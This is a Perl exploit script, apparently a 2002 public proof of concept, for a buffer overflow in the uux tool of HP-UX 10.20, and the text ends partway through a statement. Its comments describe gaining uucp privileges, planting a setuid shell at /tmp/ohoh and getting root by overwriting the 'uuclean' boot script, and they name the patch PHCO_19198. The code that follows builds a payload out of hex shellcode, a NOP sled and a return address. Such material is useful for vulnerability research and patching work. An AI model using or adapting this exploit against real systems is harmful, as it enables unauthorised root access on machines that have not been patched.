#!/usr/bin/perl # # # The /usr/bin/uux tool that comes with the HP-UX 10.20 install contains a # buffer overflow vulnerability. To reproduce this: # # /usr/bin/uux `perl -e 'print "A" x 5391;print "BBBBB"'` # # The overflow vulnerability can be used to gain uucp privileges. Ones uucp # privs have been obtains it is possible to overwrite the file 'uuclean' with # any kind of code. Because this file is executed by the S202clean_uucp script # during boot time of a default HP-UX 10.20 install, we can gain root access. # # By default this exploit gives you the setuid uucp shell /tmp/ohoh. Ask your # administrator to reboot the box and chances are high that /tmp/ohoh will be # setuid root afterwards. # # HP-UX administrators who never applied PHCO_19198 should better do this now: # http://support2.itrc.hp.com/service/patch/patchDetail.do?patchid=PHCO_19198 # # zillion (http://www.safemode.org 30/07/2002) # # Shellcode was made with help of: # http://scorpions.net/~fygrave/misc/hpux_bof.pdf $shellcode = "\xe8\x3f\x1f\xfd\x08\x21\x02\x80\x34\x02\x01\x02\x08\x41\x04". "\x02\x60\x40\x01\x62\xb4\x5a\x01\x54\x0b\x39\x02\x99\x0b\x18". "\x02\x98\x34\x16\x04\xbe\x20\x20\x08\x01\xe4\x20\xe0\x08\x96". "\xd6\x05\x34\xde\xad\xca\xfe\x2f\x74\x6d\x70\x2f\x42\x65\xff"; $nop = "\x08\x63\x02\x43"; $buffer = "A" x (1191 - length($shellcode)); for($i = 0; $i < 4200; $i +=4) { $buffer .= $nop; } $buffer .= $shellcode; $buffer .= "\x7b\x03\xb3\xc0"; open(FILE, ">/tmp/be.c") || die("Error, cannot open file /tmp/be.c : $!\n"); print FILE<